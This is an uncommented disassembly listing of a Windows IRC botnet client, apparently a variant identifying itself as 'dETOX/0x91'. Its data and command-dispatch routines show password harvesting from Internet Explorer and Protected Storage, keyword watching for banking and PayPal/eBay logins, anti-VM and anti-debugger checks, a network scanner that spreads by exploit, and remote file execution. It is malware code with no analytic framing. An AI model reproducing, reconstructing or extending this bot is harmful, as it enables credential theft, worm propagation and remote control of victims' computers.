dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h, 38h, 38000000h, 2 dup(0)
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_403F84 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 696E7302h
; DATA XREF: sub_409834+9D�o
dd 72656666h, 202D0203h, 0A0D7325h, 0
aOper db 'OPER',0 ; DATA XREF: sub_409834+6C�o
align 10h
aJoin db 'JOIN',0 ; DATA XREF: sub_409834+5B�o
align 4
aBank db 'bank',0 ; DATA XREF: sub_409834+50�o
align 10h
aLogin db 'login',0 ; DATA XREF: sub_409834+3F�o
; sub_409834+7D�o
align 4
aEBay db 'e-bay',0 ; DATA XREF: sub_409834+2E�o
align 10h
aEbay db 'ebay',0 ; DATA XREF: sub_409834+1D�o
align 4
aPaypal db 'paypal',0 ; DATA XREF: sub_409834+C�o
align 10h
dword_403FE0 dd 5B207325h, 2333003h, 65746E45h, 5D020372h, 6E695720h
; DATA XREF: sub_4098E2+108�o
; sub_4098E2+2D0�o
dd 3A776F64h, 73252820h, 29h
dd 2333003h, 2036425h, 20732520h, 2333003h, 2036425h, 20732520h
; DATA XREF: sub_409D65+D9�o
dd 2333003h, 2036425h, 732520h
aMinute db 'minute',0 ; DATA XREF: sub_409D65+CE�o
align 4
aMinutes db 'minutes',0 ; DATA XREF: sub_409D65+C7�o
aHour db 'hour',0 ; DATA XREF: sub_409D65+BF�o
align 4
aHours db 'hours',0 ; DATA XREF: sub_409D65+B8�o
align 4
aDay db 'day',0 ; DATA XREF: sub_409D65+B0�o
aDays db 'days',0 ; DATA XREF: sub_409D65+A0�o
align 10h
dword_404050 dd 646E6957h, 2073776Fh, 2333003h, 2037325haD_DBuildD db ' [%d.%d Build %d]',0
dw 0
dword_404074 dd 3F3F3Fh a2003 db '2003',0 ; DATA XREF: sub_409E5D+8F�o
align 10h
aXp db 'XP',0 ; DATA XREF: sub_409E5D+85�o
align 4
a2000 db '2000',0 ; DATA XREF: sub_409E5D+79�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_409E5D+65�o
align 10h
a98 db '98',0 ; DATA XREF: sub_409E5D+59�o
align 4
aNt db 'NT',0 ; DATA XREF: sub_409E5D+4D�o
align 4
a95 db '95',0 ; DATA XREF: sub_409E5D+3A�o
align 4
dd 3430032Dh, 73797302h, 206D6574h, 6F666E69h, 202D0203h
; DATA XREF: sub_409F1F+57�o
dd 72207325h, 696E6E75h, 6620676Eh, 2520726Fh, 6E6F2073h
dd 534F2820h, 73252029h, 50432820h, 3202955h, 25023330h
dd 20020364h, 207A484Dh, 68746977h, 41522820h, 320294Dh
dd 25023330h, 64252F64h, 4D200203h, 42h, 56495250h, 2047534Dh
dd 3A207325h, 7325202Dh, 0A0Dh, 56495250h, 2047534Dh, 3A207325h
dd 6F64202Dh, 6C20656Eh, 69747369h, 6620676Eh, 646E756Fh
dd 34300320h, 3642502h, 61702002h, 6F777373h, 0D736472h
dd 0Ah, 2333003h, 63204549h, 65686361h, 20020364h, 73736170h
dd 64726F77h, 756F6620h, 203A646Eh, 77207325h, 20687469h
dd 253A7325h, 73h, 2Ch, 2333003h, 63204549h, 65687361h
dd 20020364h, 73736170h, 64726F77h, 756F6620h, 203A646Eh
dd 77207325h, 20687469h, 7325h, 70747468h, 2F3A73h, 70747468h
dd 2F3Ah, 7274533Ah, 676E69h, 69727453h, 6E49676Eh, 786564h
dd 31363165h, 61353532h, 0
dword_4041D8 dd 2333003h, 50204549h, 77737361h, 2D64726Fh, 746F7250h
; DATA XREF: MEW:0040A221�o
dd 65746365h, 20020364h, 6E756F66h, 25203A64h, 69772073h
dd 25206874h, 73h, 65376535h, 30303138h, 0
dword_404214 dd 737725h, 7825h, 0dword_404220 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh, 6F745350h
; DATA XREF: MEW:0040A02E�o
; MEW:0040A0AD�o
dd 72436572h, 65746165h, 74736E49h, 65636E61h, 0
dword_404248 dd 56495250h, 2047534Dh, 3A207325h, 3430032Dh, 73617002h
; DATA XREF: MEW:00409FD4�o
dd 726F7773h, 2037364h, 696C202Dh, 6E697473h, 6C612067h
dd 6163206Ch, 64656863h, 73617020h, 726F7773h, 0A0D7364h
dd 0
dword_404288 dd 6F747370h, 2E636572h, 6C6C64hunk_404294 db 2Dh ; - ; DATA XREF: sub_40A5D5+42�o
db 3, 30h, 33h
db 2
db 25h, 64h, 3
db 2
aSPriorityDPidD db '- %s (priority: %d) [pid: %d]',0
align 4
unk_4042BC db 25h ; % ; DATA XREF: sub_40A5D5+14�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 72h ; r
db 6Fh, 75h, 74h
db 69h ; i
db 6Eh, 65h, 3
db 2
aListingAllStar db '- listing all started threads',0Dh,0Ah,0
align 4
aR_1: ; DATA XREF: sub_40A690�o
unicode 0, <r>,0
aCCCCCCC db '%c%c%c%c%c%c%c',0 ; DATA XREF: sub_40A6A6+C1�o
align 4
a0123456789abcd db '0123456789abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_40A6A6+27�o
align 10h
aSoftwareVmware db 'SOFTWARE\VMware, Inc.\',0 ; DATA XREF: sub_40AA5D+F�o
align 4
aIsdebuggerpres db 'IsDebuggerPresent',0 ; DATA XREF: sub_40AAA5:loc_40AADC�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_40AAA5:loc_40AAC1�o
align 10h
dword_404370 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh, 40449Ch, 0
; DATA XREF: sub_40AE7E+15�o
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_4043A0 dd offset off_40449C ; DATA XREF: MEW:off_4044E8�o
; MEW:00404524�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
flt_4043B8 dd 9.765625e-4 ; DATA XREF: sub_404530+45B�r
flt_4043BC dd 0.0 ; DATA XREF: sub_404530+42B�r
flt_4043C0 dd 1.0e-3 ; DATA XREF: sub_404530+41F�r
align 8
dword_4043C8 dd 0FFFFFFFFh, 40514Dh, 405151h, 0dword_4043D8 dd 0FFFFFFFFh, 405289h, 40528Dh, 0dword_4043E8 dd 0FFFFFFFFh, 40548Ah, 40548Eh, 0dword_4043F8 dd 0FFFFFFFFh, 405593h, 405597h, 0dword_404408 dd 0FFFFFFFFh, 405CCCh, 405CD0h, 0dword_404418 dd 0FFFFFFFFh, 405DA4h, 405DA8h, 0dword_404428 dd 0FFFFFFFFh, 40726Fh, 407273h, 0dword_404438 dd 0FFFFFFFFh, 407526h, 40752Ah, 0dword_404448 dd 0FFFFFFFFh, 407F2Ah, 407F2Eh, 0dword_404458 dd 0FFFFFFFFh, 409C55h, 409C59h, 0dword_404468 dd 0FFFFFFFFh, 40A510h, 40A514h, 0dword_404478 dd 0FFFFFFFFh, 40A7F9h, 40A7FDh, 0dbl_404488 dq -3.0517578125e-5 ; DATA XREF: sub_40A818+2C�r
dd offset dword_4044D0
off_404494 dd offset sub_40AF35 ; DATA XREF: sub_40AF03+12�o
; MEW:0040AF6A�o ...
dd offset dword_404518
off_40449C dd offset sub_40AFAA ; DATA XREF: MEW:off_4043A0�o
off_4044A0 dd offset dword_404370+10h ; DATA XREF: MEW:004044B8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4044A0
dword_4044BC dd 3 dup(0) dd 1, 4044B8h
dword_4044D0 dd 3 dup(0) dd offset dword_404370+10h
dd offset dword_4044BC+4
align 8
off_4044E8 dd offset off_4043A0 ; DATA XREF: MEW:00404500�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4044E8
dd 0
db 0 ; DATA XREF: MEW:00404528�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 404500h
dword_404518 dd 3 dup(0) dd offset off_4043A0
dd offset unk_404508
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404530 proc near ; CODE XREF: sub_4055A6+300�p
; sub_4055A6+637�p
var_1F4 = qword ptr -1F4h
var_1EC = qword ptr -1ECh
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = byte ptr -1D8h
var_158 = dword ptr -158h
var_154 = byte ptr -154h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4043C8
push offset loc_40ABC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1E4h
push ebx
push esi
push edi
mov [ebp+var_18], esp
wait
and [ebp+var_4], 0
mov edi, offset asc_401ADC ; " "
push edi
mov esi, [ebp+arg_0]
push dword ptr [esi+0Ch]
call sub_40ABB8
pop ecx
pop ecx
mov ebx, eax
mov [ebp+var_9C], ebx
mov [ebp+var_1C], 1
loc_404580: ; CODE XREF: sub_404530+73�j
cmp [ebp+var_1C], 20h
jge short loc_4045A5
push edi
push 0
call sub_40ABB8
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx*4+var_9C], eax
inc [ebp+var_1C]
mov ebx, [ebp+var_9C]
jmp short loc_404580
; ---------------------------------------------------------------------------
loc_4045A5: ; CODE XREF: sub_404530+54�j
push offset a_bot_compilati ; ".bot.compilation"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4045CA
push offset aDetox0x91Win32 ; "dETOX/0x91 (win32)"
push dword ptr [esi+4]
push dword ptr [esi]
push offset unk_401A88
jmp loc_405142
; ---------------------------------------------------------------------------
loc_4045CA: ; CODE XREF: sub_404530+84�j
push offset a_bot_leave ; ".bot.leave"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4045F4
push offset aQuitGodHatesUs ; "QUIT :god hates us all\r\n"
call sub_405185
pop ecx
call dword_401248
push 1
call dword_4010F0 ; ExitProcess
loc_4045F4: ; CODE XREF: sub_404530+A9�j
push offset dword_401A54
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_40461A
call sub_409D65
loc_40460A: ; CODE XREF: sub_404530+100�j
; sub_404530+145�j ...
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_401A48
jmp loc_405142
; ---------------------------------------------------------------------------
loc_40461A: ; CODE XREF: sub_404530+D3�j
push offset dword_401A40
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404632
call sub_409E5D
jmp short loc_40460A
; ---------------------------------------------------------------------------
loc_404632: ; CODE XREF: sub_404530+F9�j
push offset dword_401A38
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_40465F
push dword_40B244
call sub_40715A
pop ecx
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_401A10
jmp loc_405142
; ---------------------------------------------------------------------------
loc_40465F: ; CODE XREF: sub_404530+111�j
push offset dword_401A00
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404677
call sub_409F1F
jmp short loc_40460A
; ---------------------------------------------------------------------------
loc_404677: ; CODE XREF: sub_404530+13E�j
push offset dword_4019F0
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4046BA
push dword_40B270
movzx eax, word_40B0D0
push eax
push dword_40B244
call sub_40715A
pop ecx
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_4019A0
loc_4046AD: ; CODE XREF: sub_404530+ACF�j
call sub_405185
add esp, 18h
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_4046BA: ; CODE XREF: sub_404530+156�j
push offset a_harvest_passw ; ".harvest.passwords"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_40472D
cmp [ebp+var_98], eax
jnz short loc_4046DF
cmp [ebp+var_94], eax
jz loc_40514A
loc_4046DF: ; CODE XREF: sub_404530+1A1�j
mov esi, offset aPasswordFinder ; "Password Finder"
push esi
call sub_40A64F
pop ecx
test eax, eax
jnz loc_40514A
push offset dword_401978
push [ebp+var_98]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz loc_40514A
mov eax, [ebp+var_94]
mov [ebp+var_A8], eax
push esi
push 1
lea eax, [ebp+var_A8]
push eax
push offset loc_409FA1
jmp loc_404CE3
; ---------------------------------------------------------------------------
loc_40472D: ; CODE XREF: sub_404530+199�j
push offset dword_40196C
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_4047B7
mov edi, [ebp+var_98]
test edi, edi
jz loc_40514A
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA4[eax]
push edi
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_40479E
cmp byte_40B240, al
jnz short loc_40478E
push [ebp+var_94]
push edi
push offset dword_40195C
call sub_405185
add esp, 0Ch
mov byte_40B240, 1
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_40478E: ; CODE XREF: sub_404530+23C�j
push edi
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_40192C
jmp loc_405142
; ---------------------------------------------------------------------------
loc_40479E: ; CODE XREF: sub_404530+234�j
push [ebp+var_94]
push edi
push offset dword_40195C
loc_4047AA: ; CODE XREF: sub_404530+304�j
; sub_404530+5EE�j ...
call sub_405185
add esp, 0Ch
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_4047B7: ; CODE XREF: sub_404530+20C�j
push offset dword_401920
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404839
mov edi, [ebp+var_98]
test edi, edi
jz loc_40514A
mov eax, dword_40372C
imul eax, 1Ch
push off_401BA4[eax]
push edi
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404828
cmp byte_40B240, al
jz short loc_404818
push [ebp+var_94]
push edi
push offset dword_401910
call sub_405185
add esp, 0Ch
and byte_40B240, 0
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_404818: ; CODE XREF: sub_404530+2C6�j
push edi
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_4018E0
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404828: ; CODE XREF: sub_404530+2BE�j
push [ebp+var_94]
push edi
push offset dword_401910
jmp loc_4047AA
; ---------------------------------------------------------------------------
loc_404839: ; CODE XREF: sub_404530+296�j
push offset dword_4018D4
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404878
and byte_40B274, al
and byte_40B240, al
push dword_40B280
call sub_408616
mov [esp+0Ch+var_C], 0FA0h
call dword_4010F4 ; Sleep
call sub_4052A5
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_404878: ; CODE XREF: sub_404530+318�j
push offset dword_4018C4
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz loc_404A11
cmp [ebp+var_98], eax
jz loc_40514A
cmp [ebp+var_94], eax
jz loc_40514A
cmp [ebp+var_90], eax
jz loc_40514A
push offset dword_4018C0
push [ebp+var_90]
call sub_40AFA4
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
mov byte ptr [ebp+var_B0], bl
push offset dword_4018BC
push [ebp+var_8C]
call sub_40AFA4
add esp, 10h
neg eax
sbb al, al
inc al
mov byte ptr [ebp+var_B8], al
call dword_4010FC ; GetTickCount
mov [ebp+var_B4], eax
push [ebp+var_B8]
push [ebp+var_B0]
push [ebp+var_94]
push [ebp+var_98]
call sub_408825
add esp, 10h
mov edi, eax
mov [ebp+var_AC], edi
test edi, edi
jz loc_4049FC
call dword_4010FC ; GetTickCount
mov [ebp+var_BC], eax
sub eax, [ebp+var_B4]
mov dword ptr [ebp+var_1EC], eax
and dword ptr [ebp+var_1EC+4], 0
fild [ebp+var_1EC]
fmul flt_4043C0
fst [ebp+var_C8]
fcom flt_4043BC
fnstsw ax
sahf
jnz short loc_404970
fstp st
fld1
fst [ebp+var_C8]
loc_404970: ; CODE XREF: sub_404530+434�j
mov dword ptr [ebp+var_1F4], edi
and dword ptr [ebp+var_1F4+4], 0
fild [ebp+var_1F4]
fdiv st, st(1)
fst [ebp+var_C0]
fmul flt_4043B8
fstp [ebp+var_C4]
test bl, bl
fld [ebp+var_C4]
jnz short loc_4049D4
call sub_40ABC6
push eax
call sub_40ABC6
push eax
shr edi, 0Ah
push edi
push [ebp+var_94]
push [ebp+var_98]
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_401858
loc_4049C7: ; CODE XREF: sub_404530+4CA�j
call sub_405185
add esp, 20h
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_4049D4: ; CODE XREF: sub_404530+46F�j
call sub_40ABC6
push eax
call sub_40ABC6
push eax
shr edi, 0Ah
push edi
push [ebp+var_94]
push [ebp+var_98]
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_4017E8
jmp short loc_4049C7
; ---------------------------------------------------------------------------
loc_4049FC: ; CODE XREF: sub_404530+3F4�j
push [ebp+var_98]
push dword ptr [esi+4]
push dword ptr [esi]
push offset unk_4017B4
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404A11: ; CODE XREF: sub_404530+357�j
push offset a_open ; ".open"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404A5F
mov edi, [ebp+var_98]
cmp edi, eax
jz loc_40514A
push 5
push eax
push eax
push edi
push offset aOpen ; "open"
push eax
call dword_4011C8
test eax, eax
push edi
push dword ptr [esi+4]
push dword ptr [esi]
jz short loc_404A55
push offset dword_401770
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404A55: ; CODE XREF: sub_404530+519�j
push offset dword_401740
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404A5F: ; CODE XREF: sub_404530+4F0�j
push offset a_scan_start ; ".scan.start"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz loc_404CED
mov ebx, [ebp+var_98]
xor edi, edi
cmp ebx, edi
jz loc_40514A
cmp [ebp+var_94], edi
jz loc_40514A
cmp [ebp+var_90], edi
jz loc_40514A
cmp [ebp+var_8C], edi
jz loc_40514A
cmp [ebp+var_88], edi
jz loc_40514A
cmp [ebp+var_84], edi
jz loc_40514A
push offset aScanner ; "Scanner"
call sub_40A64F
pop ecx
test eax, eax
jnz loc_40514A
push offset dword_4018C0
push ebx
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404B23
push 6
push 5
call sub_40A818
pop ecx
pop ecx
mov [ebp+var_1C], eax
mov ecx, eax
imul ecx, 2Ch
mov cx, word ptr dword_402BE0[ecx]
mov word_40B254, cx
loc_404B05: ; CODE XREF: sub_404530+63A�j
mov dword_40B258, eax
loc_404B0A: ; CODE XREF: sub_404530+619�j
cmp word_40B254, 0
jnz short loc_404B71
push dword ptr [esi+4]
push dword ptr [esi]
push offset unk_4016EC
jmp loc_4047AA
; ---------------------------------------------------------------------------
loc_404B23: ; CODE XREF: sub_404530+5B2�j
push ebx
call sub_40ABAC
pop ecx
mov word_40B254, ax
mov dword_40B258, edi
mov [ebp+var_1C], edi
loc_404B39: ; CODE XREF: sub_404530+63F�j
mov eax, [ebp+var_1C]
imul eax, 2Ch
lea edi, dword_402BE0[eax]
cmp word ptr [edi], 0
jz short loc_404B0A
push ebx
lea eax, dword_402BC8[eax]
push eax
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404B6C
mov ax, [edi]
mov word_40B254, ax
mov eax, [ebp+var_1C]
jmp short loc_404B05
; ---------------------------------------------------------------------------
loc_404B6C: ; CODE XREF: sub_404530+62C�j
inc [ebp+var_1C]
jmp short loc_404B39
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_404530+5E2�j
push offset aS_0 ; "-s"
push [ebp+var_94]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404BE9
push 10h
call sub_40ABA6
mov esi, eax
mov [ebp+var_1E4], esi
mov [ebp+var_CC], esi
push off_403730
push esi
call sub_40ABA0
add esp, 0Ch
mov [ebp+var_D0], esi
mov eax, offset a_ ; "."
push eax
push eax
push esi
call sub_40AB9A
pop ecx
pop ecx
inc eax
push eax
call sub_40AB9A
pop ecx
pop ecx
mov [ebp+var_D4], eax
and byte ptr [eax+1], 0
push 0
push 0
push esi
push offset aSD_D ; "%s%d.%d"
push esi
call sub_40AB94
add esp, 14h
push esi
jmp short loc_404C0C
; ---------------------------------------------------------------------------
loc_404BE9: ; CODE XREF: sub_404530+655�j
push offset asc_4016D8 ; "-x"
push [ebp+var_94]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404C06
call sub_407125
jmp short loc_404C12
; ---------------------------------------------------------------------------
loc_404C06: ; CODE XREF: sub_404530+6CD�j
push [ebp+var_94]
loc_404C0C: ; CODE XREF: sub_404530+6B7�j
call dword_40124C
loc_404C12: ; CODE XREF: sub_404530+6D4�j
mov dword_40B250, eax
push [ebp+var_90]
call sub_40ABAC
mov dword_40B260, eax
mov [esp+0Ch+var_C], offset aR ; "-r"
push [ebp+var_8C]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404C47
and dword_40B268, eax
jmp short loc_404C6B
; ---------------------------------------------------------------------------
loc_404C47: ; CODE XREF: sub_404530+70D�j
push offset asc_4016D8 ; "-x"
push [ebp+var_8C]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz loc_40514A
mov dword_40B268, 1
loc_404C6B: ; CODE XREF: sub_404530+715�j
push [ebp+var_88]
call sub_40ABAC
pop ecx
mov dword_40B264, eax
test eax, eax
jge short loc_404C85
mov eax, 80h
loc_404C85: ; CODE XREF: sub_404530+74E�j
mov dword_40B264, eax
mov ecx, 1002h
cmp eax, ecx
jle short loc_404C95
mov eax, ecx
loc_404C95: ; CODE XREF: sub_404530+761�j
mov dword_40B264, eax
push [ebp+var_84]
call sub_40ABAC
pop ecx
mov dword_40B25C, eax
and byte_40B26C, 0
cmp [ebp+var_80], 0
jz short loc_404CD2
push offset asc_4016D0 ; "-l"
push [ebp+var_80]
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404CD2
mov byte_40B26C, 1
loc_404CD2: ; CODE XREF: sub_404530+786�j
; sub_404530+799�j
push offset aScanner ; "Scanner"
push 1
push offset dword_40B250
push offset sub_407282
loc_404CE3: ; CODE XREF: sub_404530+1F8�j
call sub_40A45C
jmp loc_405147
; ---------------------------------------------------------------------------
loc_404CED: ; CODE XREF: sub_404530+53E�j
push offset a_scan_enable ; ".scan.enable"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz loc_404D83
cmp [ebp+var_98], eax
jz loc_40514A
and [ebp+var_1C], eax
loc_404D11: ; CODE XREF: sub_404530+842�j
mov edi, [ebp+var_1C]
imul edi, 2Ch
cmp word ptr dword_402BE0[edi], 0
push [ebp+var_98]
jz short loc_404D74
lea eax, dword_402BC8[edi]
push eax
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404D6F
cmp byte_402BF0[edi], al
push off_402BDC[edi]
push dword ptr [esi+4]
push dword ptr [esi]
jz short loc_404D56
push offset unk_401688
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404D56: ; CODE XREF: sub_404530+81A�j
push offset dword_401658
call sub_405185
add esp, 10h
mov byte_402BF0[edi], 1
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_404D6F: ; CODE XREF: sub_404530+807�j
inc [ebp+var_1C]
jmp short loc_404D11
; ---------------------------------------------------------------------------
loc_404D74: ; CODE XREF: sub_404530+7F5�j
; sub_404530+8C7�j
push dword ptr [esi+4]
push dword ptr [esi]
push offset unk_401618
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404D83: ; CODE XREF: sub_404530+7CC�j
push offset dword_401608
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404DC3
push offset aScanner ; "Scanner"
call sub_40A64F
pop ecx
test eax, eax
jz loc_40514A
push dword_40B0C8
call sub_40715A
pop ecx
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_4015CC
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404DC3: ; CODE XREF: sub_404530+862�j
push offset a_scan_disable ; ".scan.disable"
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404E4A
cmp [ebp+var_98], eax
jz loc_40514A
and [ebp+var_1C], eax
loc_404DE3: ; CODE XREF: sub_404530+918�j
mov edi, [ebp+var_1C]
imul edi, 2Ch
cmp word ptr dword_402BE0[edi], 0
push [ebp+var_98]
jz loc_404D74
lea eax, dword_402BC8[edi]
push eax
call sub_40AFA4
pop ecx
pop ecx
test eax, eax
jnz short loc_404E45
cmp byte_402BF0[edi], al
push off_402BDC[edi]
push dword ptr [esi+4]
push dword ptr [esi]
jnz short loc_404E2C
push offset unk_401584
jmp loc_405142
; ---------------------------------------------------------------------------
loc_404E2C: ; CODE XREF: sub_404530+8F0�j
push offset dword_401554
call sub_405185
add esp, 10h
and byte_402BF0[edi], 0
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_404E45: ; CODE XREF: sub_404530+8DD�j
inc [ebp+var_1C]
jmp short loc_404DE3
; ---------------------------------------------------------------------------
loc_404E4A: ; CODE XREF: sub_404530+8A2�j
push offset dword_401548
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz short loc_404EBA
mov edi, offset aScanner ; "Scanner"
push edi
call sub_40A64F
pop ecx
test eax, eax
jz loc_40514A
and byte_40B248, 0
push 1388h
call dword_4010F4 ; Sleep
push edi
call sub_40A64F
push eax
call sub_40A56C
push dword_40B0C8
call sub_40715A
add esp, 0Ch
push eax
push dword ptr [esi+4]
push dword ptr [esi]
push offset dword_401510
call sub_405185
add esp, 10h
and dword_40B0C8, 0
jmp loc_40514A
; ---------------------------------------------------------------------------
loc_404EBA: ; CODE XREF: sub_404530+929�j
push offset dword_401504
push ebx
call sub_40ABB2
pop ecx
pop ecx
test eax, eax
jnz loc_404F7A
xor ebx, ebx
mov [ebp+var_158], ebx
push offset dword_4014F0
lea eax, [ebp+var_154]
push eax
call sub_40AB94
pop ecx
pop ecx
mov [ebp+var_1C], ebx
mov edi, 80h
